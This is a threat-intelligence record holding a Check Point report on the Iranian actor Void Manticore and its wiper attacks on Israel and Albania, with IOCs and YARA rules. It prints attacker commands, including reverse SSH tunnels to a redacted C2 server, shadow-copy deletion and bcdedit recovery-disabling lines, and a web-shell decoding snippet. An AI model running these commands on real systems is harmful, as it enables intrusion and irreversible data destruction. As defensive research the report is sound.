{ "id": "e0f5a287-b5de-4e12-8f07-20a95765c9b8", "created_at": "2026-04-15T02:22:53.730074Z", "updated_at": "2026-04-18T02:21:00.079807Z", "deleted_at": null, "sha1_hash": "ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b", "title": "Bad Karma, No Justice: Void Manticore Destructive Activities in Israel", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 125609, "plain_text": "Bad Karma, No Justice: Void Manticore Destructive Activities in\r\nIsrael\r\nBy etal\r\nPublished: 2024-05-20 · Archived: 2026-04-15 02:00:42 UTC\r\nVoid Manticore is an Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS).\r\nThey carry out destructive wiping attacks combined with influence operations.\r\nThe threat actor operates several online personas, with the most prominent among them being Homeland\r\nJustice for attacks in Albania and Karma for attacks carried out in Israel.\r\nThere are clear overlaps between the targets of Void Manticore and Scarred Manticore, with indications of\r\nsystematic hand off of targets between those two groups when deciding to conduct destructive activities\r\nagainst existing victims of Scarred Manticore.\r\nVoid Manticore utilizes five different methods to conduct disruptive operations against its victims. This\r\nincludes several custom wipers for both Windows and Linux, alongside manual deletion of files and shared\r\ndrives.\r\nIntroduction\r\nSince October 2023, Check Point Research (CPR) has actively monitored and hunted state-sponsored threats\r\ntargeting Israeli organizations with destructive attacks using wipers and ransomware. Among these threats, Void\r\nManticore (aka Storm-842) stands out as an Iranian threat actor known for conducting destructive attacks and\r\nleaking information through the online persona ’Karma’ (sometime written as KarMa).\r\nVoid Manticore’s activities extend beyond Israel, as the group has also executed attacks in Albania using the\r\npersona ’Homeland Justice’ to leak some of the collected data. In Israel, the group’s attacks are distinguished by\r\nthe utilization of the custom BiBi wiper, named after Israeli Prime Minister Benjamin Netanyahu.\r\nOur analysis of Void Manticore’s intrusions and information leaks reveals a significant overlap in victimology\r\nwith Scarred Manticore (aka Storm-861), suggesting a collaboration between the two groups. We were able to\r\nidentify a clear “handoff” procedure of victims from Scarred Manticore to Void Manticore in some instances\r\nbetween the two groups. This phenomenon is evident in several cases involving victims in both Israel and Albania,\r\nindicating that cooperation between the threat actors extends beyond single operations or incidents.\r\nThe techniques, tactics, and procedures (TTPs) employed by Void Manticore are relatively straightforward and\r\nsimple, involving hands-on efforts using basic, mostly publicly available tools. They often perform lateral\r\nmovements using Remote Desktop Protocol (RDP) and typically deploy their wipers manually while conducting\r\nother manual deletion operations. The collaboration with Scarred Manticore, which appears to be a more\r\nsophisticated actor, has likely facilitated Void Manticore’s access to high-value targets.\r\nKarma Below 80\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 1 of 13\n\nIn light of the conflicts and rising tensions in the Middle East, a wide range of hack and leak personas have\r\nemerged targeting Israel. Initially, the group known as Karma didn’t stand out, as they were perceived as part of a\r\nmuch wider effort carried out by hacktivists and state-sponsored actors. However, the group began to garner more\r\npublic attention when it was linked to the BiBi wiper, a custom wiper named after Israeli Prime Minister Benjamin\r\nNetanyahu.\r\nFigure 1 - A snippet from the Karmabelow80 website.\r\nFigure 1 – A snippet from the Karmabelow80 website.\r\nKarma joined the arena with a Telegram Channel soon after the Israeli-Hamas war broke out and launched its\r\nwebsite in November 2023. The website further established a fake persona of an anti-Zionist Jewish group (“Anti-Zionist Jewish Hackers”) that opposes the Israeli government and specifically Benjamin Netanyahu (Bibi). Karma\r\nclaims to be a product of the “butterfly effect” spurred by the government’s military actions and therefore uses a\r\nbutterfly icon as part of its symbol.\r\nSince its first appearance, the group claims to have successfully targeted over 40 Israeli organizations, including\r\nseveral high-value targets. According to their publications, the attacks involved wiping, stealing, and publishing\r\nthe victims’ data.\r\nWhile analyzing the leaks from Karma, we observed a reoccurring pattern: overlaps between leaked information\r\nand the victims of Scarred Manticore, an Iranian actor CPR has been tracking for months. These overlaps\r\nprompted the team to further analyze the connection between Karma and Scarred Manticore. Our findings led us\r\nto the activities of another actor we refer to as Void Manticore, who likely operates the Karma persona and\r\nutilizes access previously obtained by Scarred Manticore.\r\n“One-Two Punch” – a Handoff Procedure\r\nIn addition to overlaps in the threat actors’ victims, our technical investigation detected an apparent handoff\r\nprocedure between the attackers.\r\nIn the case of one victim, we discovered that after residing on the targeted network for over a year, Scarred\r\nManticore was interacting with the infected machine at the exact moment a new web shell was dropped to disk.\r\nFollowing the shell’s deployment, a different set of IPs began accessing the network, suggesting the involvement\r\nof another actor – Void Manticore. The newly deployed web shell and subsequent tools were significantly less\r\nsophisticated than those in Scarred Manticore’s arsenal. However, they led to the deployment of the BiBi wiper,\r\nwhich is linked to Karma’s activity.\r\nOne of the first identified activities carried out by Void Manticore involved the use of a Domain Admin account.\r\nThis suggests that the handoff process included more than just web shell deployments, but also access to\r\nadditional information about the network.\r\nFigure 2 - A high-level timeline of the Void-Scarred Connection.\r\nFigure 2 – A high-level timeline of the Void-Scarred Connection.\r\nFrom Albania to The Middle East\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 2 of 13\n\nThis handoff procedure is not unprecedented and is highly correlated with Microsoft’s reporting on the destructive\r\nattacks against Albania in 2022. In that incident, Storm-0861 (aka Scarred Manticore) was responsible for the\r\ninitial access and data exfiltration, while Storm-0842 (aka Void Manticore) carried out the destructive attack. In\r\nthis context, Karma’s activity closely resembles another persona linked to the actor by other vendors: Homeland\r\nJustice.\r\nFigure 3 - Homeland Justice utilizes politically charged messages.\r\nFigure 3 – Homeland Justice utilizes politically charged messages.\r\nA comparison of the process that happened in Albania and in Israel is summarized in the table below:\r\nAlbania (2022) Israel (2023-2024)\r\nActor #1 Storm-0861 ~ Scarred Manticore\r\nActor #1 Initial Access CVE-2019-0604 CVE-2019-0604\r\nActor #1 Tools Foxshell Liontail\r\nActor #1 Access Time Over a year Over a year\r\nActor #1 Objective Email Exfiltration Email Exfiltration (LionHead)\r\nActor #2 Storm-0842 ~ Void Manticore\r\nActor #2 Initial Access Provided by Actor #1 Provided by Actor #1\r\nActor #1 Objective Wiper (CL Wiper) + Ransomware Wiper (BiBi Wiper)\r\nLeaking Persona Homeland Justice Karma\r\nThe overlaps in techniques employed in attacks against Israel and Albania, including the coordination between the\r\ntwo different actors, suggest this process has become routine. The ties between the events in Israel and Albania\r\nhave strengthened with the latest attacks against Albania (late 2023 and early 2024), during which Void Manticore\r\ndropped partition wipers similar to those used in Israel as part of the BiBi wiper attacks.\r\nTechniques, Tactics, and Procedures\r\nVoid Manticore’s TTPs are straightforward and aligned with their goal of quick and dirty destructive operations.\r\nIn some instances, Void Manticore’s access was established through an internet-facing web server, on which the\r\ngroup utilized various web shells. Among those was “Karma Shell”, which appears to be a homebrew tool. While\r\nmasquerading as an error page (based on the page’s title and content), this tool can perform several functions. It\r\ncan list directories, create processes, upload files, and start/stop/list services. Additionally, it employs base64 and a\r\none-byte XOR to decrypt the supplied parameters.\r\nPlain text\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 3 of 13\n\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n// One-Byte XOR Decryption of received argument\r\nprivate string decode_str(string source)\r\n{\r\nreturn System.Text.Encoding.UTF8.GetString(decode(source));\r\n}\r\nprivate byte[] decode(string source)\r\n{\r\nbyte[] data = Convert.FromBase64String(source);\r\nfor (byte i = 0; i \u003c data.Length; i++)\r\ndata[i] ^= 23;\r\nreturn data;\r\n}\r\n// One-Byte XOR Decryption of received argument private string decode_str(string source) { return\r\nSystem.Text.Encoding.UTF8.GetString(decode(source)); } private byte[] decode(string source) { byte[] data =\r\nConvert.FromBase64String(source); for (byte i = 0; i \u003c data.Length; i++) data[i] ^= 23; return data; }\r\n// One-Byte XOR Decryption of received argument\r\nprivate string decode_str(string source)\r\n {\r\n return System.Text.Encoding.UTF8.GetString(decode(source));\r\n }\r\nprivate byte[] decode(string source)\r\n {\r\n byte[] data = Convert.FromBase64String(source);\r\n for (byte i = 0; i \u003c data.Length; i++)\r\n data[i] ^= 23;\r\n return data;\r\n }\r\nFigure 4 – Snippet from Karma Shell.\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 4 of 13\n\nAs we monitored the activity of the group’s interaction with “Karma Shell”, we retrieved some of the commands\r\nexecuted by the attacker on the compromised server.\r\n# parameter argument\r\n1 run_command c:\\windows\\system32\\cmd.exe /c echo %userprofile%\r\n2 upload_file C:\\ProgramData\\a.txt\r\n3 run_command c:\\windows\\system32\\cmd.exe /c ping.exe -n 1 4.2.2.4\r\n4 run_command c:\\windows\\system32\\cmd.exe /c ping.exe -n 1 microsoft.com\r\n5 run_command\r\nc:\\windows\\system32\\cmd.exe /c net user REDACTED_USERNAME\r\n/domain\r\n6 upload_file C:\\ProgramData\\REDACTED_NAME_WEBSHELL_reGeorge\r\n7 upload_file C:\\ProgramData\\do.zip\r\n8 run_command\r\nC:\\windows\\system32\\cmd.exe /c “C:\\Program\r\nFiles\\WinRAR\\WinRAR.exe” x -o+ C:\\ProgramData\\do.zip *.*\r\nC:\\ProgramData\r\n9 run_command C:\\windows\\system32\\cmd.exe /c C:\\Programdata\\do.exe\r\nOne notable activity we observed in Void Manticore is the uploading of a tailor-made executable file,  do.exe .\r\nThis file checks authentication for Domain Admin credentials. If the authentication is successful, the executable\r\ncopies another web shell, a publicly available reGeorge, to the web directory, indicating the credentials are valid.\r\nUsing a binary with hard-coded Domain Admin credentials strengthens the assumption that the access was handed\r\noff to the group by another entity.\r\nFigure 5 - “Do.exe” with hard-coded credentials of Domain Admin.\r\nFigure 5 – “Do.exe” with hard-coded credentials of Domain Admin.\r\nAfter deploying the reGeorge tunneling web shell, the actor continues to move laterally using RDP and collects\r\ninformation about target networks using SysInternal’s AD Explorer. On some of those hosts, the threat actor\r\nestablishes a C2 channel using an OpenSSH client. This is executed in the following manner, setting up a SOCKS\r\nproxy from compromised hosts:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 5 of 13\n\nssh root@REDACTED_C2_SERVER -R 1090 -p 443 -o ServerAliveInterval=60\r\nssh root@REDACTED_C2_SERVER -R 1080 -p 443 -o ServerAliveInterval=60\r\nssh root@REDACTED_C2_SERVER -R 1090 -p 443 -o ServerAliveInterval=60 ssh\r\nroot@REDACTED_C2_SERVER -R 1080 -p 443 -o ServerAliveInterval=60\r\nssh root@REDACTED_C2_SERVER -R 1090 -p 443 -o ServerAliveInterval=60\r\nssh root@REDACTED_C2_SERVER -R 1080 -p 443 -o ServerAliveInterval=60\r\nFigure 6 – Void Manticore SSH client executions.\r\nIn all the cases we observed targeting Israel in the last months, the access was later utilized to execute destructive\r\nactivities, either with custom automated payloads or manual data destruction procedures.\r\nWipers\r\nVoid Manticore utilizes a set of custom wipers in their attacks.\r\nSome of Void Manticore’s wipers target and destroy the files themselves, corrupting specific files or file types\r\nwithin the infected systems. This approach allows the malware to selectively erase critical information, causing\r\ntargeted damage to applications, user data, and system functionality.\r\nThe other wipers attack the system’s partition table. Instead of deleting individual files, these wipers obliterate the\r\npartition table, the component that stores the layout of the disk, including partitions where files are organized. By\r\ndestroying the partition table, the malware essentially removes the map that the operating system uses to locate\r\nand access data. As a result, all data on the disk becomes inaccessible, even though the data itself remains\r\nunaltered on the storage medium.\r\nCl Wiper\r\nCI Wiper is the first wiper used by the group in the first attack against Albania in July 2022, the details of which\r\nwere published by CISA.\r\nHow it works: cl.exe  gets arguments from the command line and uses a legitimate driver by ElRawDisk,\r\ncalled  rwdsk.sys . The use of ElRawDisk is relatively common among wipers and has been previously used by\r\nseveral wiper families, some of them associated with Iranian actors. Additionally, the license key used in the wiper\r\nis the same as the one used in the ZeroCleare wiper, which is known to be used by several actors with links to\r\nMOIS. ElRawDisk enables interaction with files, disks, and partitions, proxying the wiping procedures and\r\nallowing raw access to the disk.\r\nThe cl wiper supports three commands:\r\nin – Installs  rwdsk.sys  as a service named  RawDisk3  and loads it.\r\nun – Uninstalls the  RawDisk3  service.\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 6 of 13\n\nwp – Accesses  rwdsk.sys  for wiping with the IOCTLs  0x227F80  or  0x22BF84 , depending on the\r\nWindows version. These IOCTLs overwrite the contents of the physical drive with a predefined buffer. The\r\nCl Wiper buffer is filled with ‘0’ characters.\r\nFigure 7 - Cl Wiper main method and supported arguments.\r\nFigure 7 – Cl Wiper main method and supported arguments.\r\nPartition Wipers\r\nSome of Void’s Manticore wipers are pretty straightforward, performing only one function: they iterate over\r\navailable physical disks and then send an IOCTL (input/output control)\r\nnamed  IOCTL_DISK_DELETE_DRIVE_LAYOUT  (0x7c100).\r\nThis IOCTL removes partition information from the disk. If the partition style of the disk is Master Boot Record\r\n(MBR), it removes the signatures of the relevant drive from the partition table. If the partition style of the disk is\r\nGUID Partition Table (GPT), it wipes clean both the primary partition table header in sector 1 and the backup\r\npartition table in the last sector of the disk. As a result, it triggers a blue screen of death (BSOD) and crashes the\r\ndisk during reboot due to a corrupted partition table, which does not have any information on which offsets each\r\npartition resides on the disk.\r\nIn the attacks against Albania in December 2023, the wiper was internally called  LowEraser  based on its PDB\r\npath (also called the  No-Justice Wiper  by ClearSky). This file was signed by  Attest Inspection\r\nLimited,  and the icon of the file matches the logo on the company website.\r\nVoid Manticore also used this type of wiper in attacks against Albanian entities such as INSTAT, where the tool\r\nwas called  Pinky  based on its PDB path, and in the attacks against Israeli entities, where it was internally\r\ncalled  JustMBR .\r\nFigure 8 - Partition Wipers’ main logic.\r\nFigure 8 – Partition Wipers’ main logic.\r\nThere are minor differences between the variants of this wiper, such as debug strings that appear only in some of\r\nthem.\r\nBiBi Wiper\r\nIn their most recent attacks, Void Manticore used a custom wiper called the BiBi wiper, referencing the nickname\r\nof Israel’s prime minister, Benjamin Netanyahu. The wiper was deployed in several campaigns against multiple\r\nentities in Israel and has variants for both Linux and Windows.\r\nLinux Version\r\nOn October 30, 2023, Security Joes published research about a new wiper used against Israeli companies during\r\nthe Israel-Hamas war. The file name of this wiper was  bibi-linux.out , and the extensions of the wiped files\r\nwere  “.BiBi” .\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 7 of 13\n\nBiBi Wiper can receive command-line parameters such as the  target_path (which is “/” by default). The wiper\r\nuses several threads, based on the number of CPU cores, for the wiping process and employs a queue to\r\nsynchronize between them. It then corrupts the files with buffers of random data and renames the infected files\r\nwith random names and the  “.BiBi”  extension ( [RANDOM_NAME].BiBi[NUMBER] ).\r\nInterestingly, BiBi Wiper doesn’t infect files with the extensions  “.out”  and  “.so” , likely because it relies on\r\nfiles with those extensions (like  bibi-linux.out ) and other libraries essential for the OS and to keep the process\r\nrunning.\r\nWindows Version\r\nA Windows variant of the wiper, also named  bibi.exe , was found several days later, exhibiting a similar flow.\r\nThe wiper works with several threads based on the number of processors and avoids destroying files important to\r\nits operations (the Windows variant doesn’t destroy  .exe ,  .dll  and  .sys  files). The Windows variant also\r\ngets arguments such as the  target_path , with a default value set to  C:\\\\Users .\r\nThere are several differences between the Linux variant and the Windows variant:\r\nIn the Windows variant, the extension for the wiped files is  “.BiBi\u003cnumber from 1 to 5\u003e” .\r\nThe Windows variant deletes shadow copies from the system with the commands:\r\ncmd.exe /c vssadmin delete shadows /quIet /all\r\ncmd.exe /c wmic shadowcopy delete\r\nThe Windows variant disables the system’s trigger to call the Error Recovery screen on startup with the\r\ncommand  cmd.exe / c bcdedit / set {default} bootstatuspolicy ignoreallfailures  and then turns\r\nit off with the command  cmd.exe /c bcdedit /set {default} recoveryenabled no .\r\nAll the command strings are stored in reverse.\r\nFigure 9 - cmd.exe commands are stored backwards.\r\nFigure 9 – cmd.exe commands are stored backwards.\r\nIn February 2024, we found other variants of the wiper, which are more targeted than the earlier versions.\r\nThey enter the main flow only if the string “Israel” is not equal to the string “Country”:\r\nFigure 10 - The malware authors seemingly mock the victims.\r\nFigure 10 – The malware authors seemingly mock the victims.\r\nOne of the new samples lacks the features to delete the shadow copies and disable the Error recovery.\r\nThe new samples have a different extension for the files,  “.bb\u003crandom_number\u003e” . This is probably to\r\navoid security solutions that signed the former extension.\r\nThe new samples have the same ability as the partition wipers to remove partition information from the\r\ndisk.\r\nFigure 11 - The same code in both partition wipers and the BiBi Wiper.\r\nFigure 11 – The same code in both partition wipers and the BiBi Wiper.\r\nManual Data Destruction Activity\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 8 of 13\n\nIn addition to deploying custom wipers, the group singles out victims for manual data-destruction activities using\r\n“seemingly” legitimate utilities:\r\nFile Deletion via Windows Explorer: Void Manticore achieved data destruction on hosts by deleting files\r\nvia the Windows File Explorer.\r\nSysInternals SDelete: Void Manticore also used SDelete to conduct secure data wiping manually.\r\nWindows Format Utility: The actors often utilized the Windows Format utility to corrupt the partition using\r\nthe “Quick Format” option. It was also used to perform a “Full” format that corrupted the partition and its\r\ncontent.\r\nFigure 12 - Windows Format Utility.\r\nFigure 12 – Windows Format Utility.\r\nConclusion\r\nThis article provides an in-depth analysis of the attacks carried out by Void Manticore, an Iranian threat actor that\r\ntargets Israeli organizations as part of a broader Iranian offensive strategy. Void Manticore’s operations are\r\ncharacterized by their dual approach, combining psychological warfare with actual data destruction. This is\r\nachieved through their use of wiping attacks and by publicly leaking information, thereby amplifying the\r\ndestruction on the targeted organizations.\r\nVoid Manticore’s use of distinct online personas, notably “Homeland Justice” and “Karma,” plays a significant\r\nrole in their strategy. The personas allow them to tailor their messaging in an attempt to effectively weaponize\r\npolitical tensions. The deployment of the custom BiBi wiper in their operations against Israeli targets showcases\r\ntheir intent to not only cause direct damage but also to send a politically charged message.\r\nThe collaboration between Void Manticore and Scarred Manticore reveals a high degree of coordination within\r\ntheir operations. The documented handoff procedures between these groups suggest a consistent level of planning\r\nand allow Void Manticore access to a wider set of targets, facilitated by their counterparts’ advanced capabilities.\r\nThis cooperation positions Void Manticore as an exceptionally dangerous actor within the Iranian threat landscape.\r\nCheck Point Customers Remain Protected\r\nCheck Point Customers remain protected against attacks detailed in this report, while using IPS, Check Point\r\nHarmony Endpoint and Threat Emulation.\r\nIPS:\r\nBackdoor.WIN32.Liontail.A/B\r\nThreat Emulation:\r\nAPT.Wins.Liontail.C/D\r\nAPT.Wins.VoidManticore.ta.A-H \r\nAPT.Wins.ScarredManticore.ta.A/B\r\nHarmony Endpoint:\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 9 of 13\n\nRansomware.Win.BiBiWiper.A-F\r\nRansomware_Linux_Bibi_B, Ransomware_Linux_Bibi_D\r\nIndicators of Compromise\r\n64.176.169.22\r\n64.176.172.235\r\n64.176.172.165\r\n64.176.173.77\r\n64.176.172.101\r\nD0C03D40772CD468325BBC522402F7B737F18B8F37A89BACC5C8A00C2B87BFC6\r\nDEEAF85B2725289D5FC262B4F60DDA0C68AE42D8D46D0DC19B9253B451AEA25A\r\n87F0A902D6B2E2AE3647F10EA214D19DB9BD117837264AE15D622B5314FF03A5\r\n85FA58CC8C4560ADB955BA0AE9B9D6CAB2C381D10DBD42A0BCEB8B62A92B7636\r\n74D8D60E900F931526A911B7157511377C0A298AF986D42D373F51AAC4F362F6\r\nCC77E8AB73B577DE1924E2F7A93BCFD852B3C96C6546229BC8B80BF3FD7BF24E\r\nYara Rules\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nrule APT_IR_VoidManticore_JustMbr\r\n{\r\nmeta:\r\ndescription = \"A wiper destroying the MBR partition table used by VoidManticore\"\r\nhash = \"cc77e8ab73b577de1924e2f7a93bcfd852b3c96c6546229bc8b80bf3fd7bf24e\"\r\nstrings:\r\n$rich_header = {7B 20 15 F1 3F 41 7B A2 3F 41 7B A2 3F 41 7B A2}\r\n$format_string = \"DiskHandle: %d, Wiped: %d, Error: %d\"\r\n$physical_drive = {5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 00}\r\n$ioctl_code = {BA 00 C1 07 00 48 ?? ?? ?? ?? 48 8B CF}\r\ncondition:\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 10 of 13\n\n$rich_header or $format_string or ($physical_drive and $ioctl_code)\r\n}\r\nrule APT_IR_VoidManticore_BibiWiper\r\n{\r\nmeta:\r\ndescription = \"A wiper used by VoidManticore having BB extensions\"\r\nhash = \"40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17\"\r\nstrings:\r\n$commands_1 = \"lla/ teIuq/ swodahs eteled nimdassv c/ exe.dmc\" ascii\r\n$commands_2 = \"eteled ypocwodahs cimw c/ exe.dmc\" ascii\r\n$commands_3 = \"seruliafllaerongi ycilopsutatstoob }tluafed{ tes / tidedcb c / exe.dmc\" ascii\r\n$commands_4 = \"on delbaneyrevocer }tluafed{ tes/ tidedcb c/ exe.dmc\" ascii\r\n$string_stats = \"[+] Stats: %d | %d\"\r\n$string_cpucores = \"[+] CPU cores: %d, Threads: %d\"\r\n$string_cpucores_2 = \"[+] CPU: %d , Threads: %d\"\r\n$string_diskname = \"DiskName: %s, Deleted: %d - %d\"\r\n$string_waiting_queue = \"[!] Waiting For Queue \"\r\ncondition:\r\nuint16(0) == 0x5A4D and\r\nuint32(uint32(0x3C)) == 0x00004550 and\r\n(3 of ($commands_*) or any of ($string_*))\r\n}\r\nrule APT_IR_VoidManticore_JustMbr { meta: description = \"A wiper destroying the MBR partition table used by\r\nVoidManticore\" hash = \"cc77e8ab73b577de1924e2f7a93bcfd852b3c96c6546229bc8b80bf3fd7bf24e\" strings:\r\n$rich_header = {7B 20 15 F1 3F 41 7B A2 3F 41 7B A2 3F 41 7B A2} $format_string = \"DiskHandle: %d,\r\nWiped: %d, Error: %d\" $physical_drive = {5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 00}\r\n$ioctl_code = {BA 00 C1 07 00 48 ?? ?? ?? ?? 48 8B CF} condition: $rich_header or $format_string or\r\n($physical_drive and $ioctl_code) } rule APT_IR_VoidManticore_BibiWiper { meta: description = \"A wiper used\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 11 of 13\n\nby VoidManticore having BB extensions\" hash =\r\n\"40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17\" strings: $commands_1 = \"lla/ teIuq/\r\nswodahs eteled nimdassv c/ exe.dmc\" ascii $commands_2 = \"eteled ypocwodahs cimw c/ exe.dmc\" ascii\r\n$commands_3 = \"seruliafllaerongi ycilopsutatstoob }tluafed{ tes / tidedcb c / exe.dmc\" ascii $commands_4 = \"on\r\ndelbaneyrevocer }tluafed{ tes/ tidedcb c/ exe.dmc\" ascii $string_stats = \"[+] Stats: %d | %d\" $string_cpucores = \"\r\n[+] CPU cores: %d, Threads: %d\" $string_cpucores_2 = \"[+] CPU: %d , Threads: %d\" $string_diskname =\r\n\"DiskName: %s, Deleted: %d - %d\" $string_waiting_queue = \"[!] Waiting For Queue \" condition: uint16(0) ==\r\n0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (3 of ($commands_*) or any of ($string_*)) }\r\nrule APT_IR_VoidManticore_JustMbr\r\n{\r\n meta:\r\n description = \"A wiper destroying the MBR partition table used by VoidManticore\"\r\n hash = \"cc77e8ab73b577de1924e2f7a93bcfd852b3c96c6546229bc8b80bf3fd7bf24e\"\r\n strings:\r\n $rich_header = {7B 20 15 F1 3F 41 7B A2 3F 41 7B A2 3F 41 7B A2}\r\n $format_string = \"DiskHandle: %d, Wiped: %d, Error: %d\"\r\n $physical_drive = {5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 00}\r\n $ioctl_code = {BA 00 C1 07 00 48 ?? ?? ?? ?? 48 8B CF}\r\n condition:\r\n $rich_header or $format_string or ($physical_drive and $ioctl_code)\r\n}\r\nrule APT_IR_VoidManticore_BibiWiper\r\n{\r\n meta:\r\n description = \"A wiper used by VoidManticore having BB extensions\"\r\n hash = \"40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17\"\r\n strings:\r\n $commands_1 = \"lla/ teIuq/ swodahs eteled nimdassv c/ exe.dmc\" ascii\r\n $commands_2 = \"eteled ypocwodahs cimw c/ exe.dmc\" ascii\r\n $commands_3 = \"seruliafllaerongi ycilopsutatstoob }tluafed{ tes / tidedcb c / exe.dmc\" ascii\r\n $commands_4 = \"on delbaneyrevocer }tluafed{ tes/ tidedcb c/ exe.dmc\" ascii\r\n $string_stats = \"[+] Stats: %d | %d\"\r\n $string_cpucores = \"[+] CPU cores: %d, Threads: %d\"\r\n $string_cpucores_2 = \"[+] CPU: %d , Threads: %d\"\r\n $string_diskname = \"DiskName: %s, Deleted: %d - %d\"\r\n $string_waiting_queue = \"[!] Waiting For Queue \"\r\n condition:\r\n uint16(0) == 0x5A4D and\r\n uint32(uint32(0x3C)) == 0x00004550 and\r\n (3 of ($commands_*) or any of ($string_*))\r\n}\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 12 of 13\n\nSource: https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 13 of 13\n\nrule APT_IR_VoidManticore_JustMbr VoidManticore\" hash = \"cc77e8ab73b577de1924e2f7a93bcfd852b3c96c6546229bc8b80bf3fd7bf24e\" { meta: description = \"A wiper destroying the MBR partition table used by strings:\n$rich_header = {7B 20 15 F1 3F 41 7B A2 3F 41 7B A2 3F 41 7B A2} $format_string = \"DiskHandle: %d,\nWiped: %d, Error: %d\" $physical_drive = {5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 00}\n$ioctl_code = {BA 00 C1 07 00 48 ?? ?? ?? ?? 48 8B CF} condition: $rich_header or $format_string or\n($physical_drive and $ioctl_code) } rule APT_IR_VoidManticore_BibiWiper { meta: description = \"A wiper used\n Page 11 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA" ], "origins": [ "web" ], "references": [ "https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/" ], "report_names": [ "bad-karma-no-justice-void-manticore-destructive-activities-in-israel" ], "threat_actors": [ { "id": "9df96153-0450-4cbb-8a13-b737f16394ef", "created_at": "2023-11-03T02:00:07.788769Z", "updated_at": "2026-04-18T02:00:03.67814Z", "deleted_at": null, "main_name": "Scarred Manticore", "aliases": [], "source_name": "MISPGALAXY:Scarred Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "92c0dae2-e255-4b90-8d8f-be88e393ab8d", "created_at": "2022-10-25T16:07:24.402328Z", "updated_at": "2026-04-18T02:00:05.345906Z", "deleted_at": null, "main_name": "Wild Neutron", "aliases": [ "Butterfly", "Morpho", "Sphinx Moth", "The Postal Group", "Wild Neutron" ], "source_name": "ETDA:Wild Neutron", "tools": [ "HesperBot", "Jiripbot", "JripBot" ], "source_id": "ETDA", "reports": null }, { "id": "72fea432-77a6-437a-b02d-693e99d81ef9", "created_at": "2024-02-17T02:00:03.861221Z", "updated_at": "2026-04-18T02:00:03.91247Z", "deleted_at": null, "main_name": "BANISHED KITTEN", "aliases": [ "Storm-0842", "Red Sandstorm" ], "source_name": "MISPGALAXY:BANISHED KITTEN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "13e58cc3-9acc-4564-8f84-b8cc0082ee4a", "created_at": "2024-05-23T02:00:03.982213Z", "updated_at": "2026-04-18T02:00:03.958281Z", "deleted_at": null, "main_name": "Void Manticore", "aliases": [], "source_name": "MISPGALAXY:Void Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7f25e108-e694-49b6-a494-c8458b33eb3f", "created_at": "2024-01-09T02:00:04.199217Z", "updated_at": "2026-04-18T02:00:03.846222Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [], "source_name": "MISPGALAXY:HomeLand Justice", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf", "created_at": "2024-01-18T02:02:34.189827Z", "updated_at": "2026-04-18T02:00:05.080342Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [ "Banished Kitten", "Karma", "Red Sandstorm", "Storm-0842", "Void Manticore" ], "source_name": "ETDA:HomeLand Justice", "tools": [ "BABYWIPER", "BiBi Wiper", "BiBi-Linux Wiper", "BiBi-Windows Wiper", "Cl Wiper", "LowEraser", "No-Justice Wiper", "Plink", "PuTTY Link", "RevSocks", "W2K Res Kit" ], "source_id": "ETDA", "reports": null }, { "id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb", "created_at": "2025-08-07T02:03:24.769383Z", "updated_at": "2026-04-18T02:00:04.810428Z", "deleted_at": null, "main_name": "COBALT MYSTIQUE", "aliases": [ "Banished Kitten ", "DEV-0842 ", "Druidfly ", "Handala Hack Team", "Homeland Justice", "Karmabelow80", "Red Sandstorm ", "Storm-0842 ", "Void Manticore " ], "source_name": "Secureworks:COBALT MYSTIQUE", "tools": [ "AllinOneNeo", 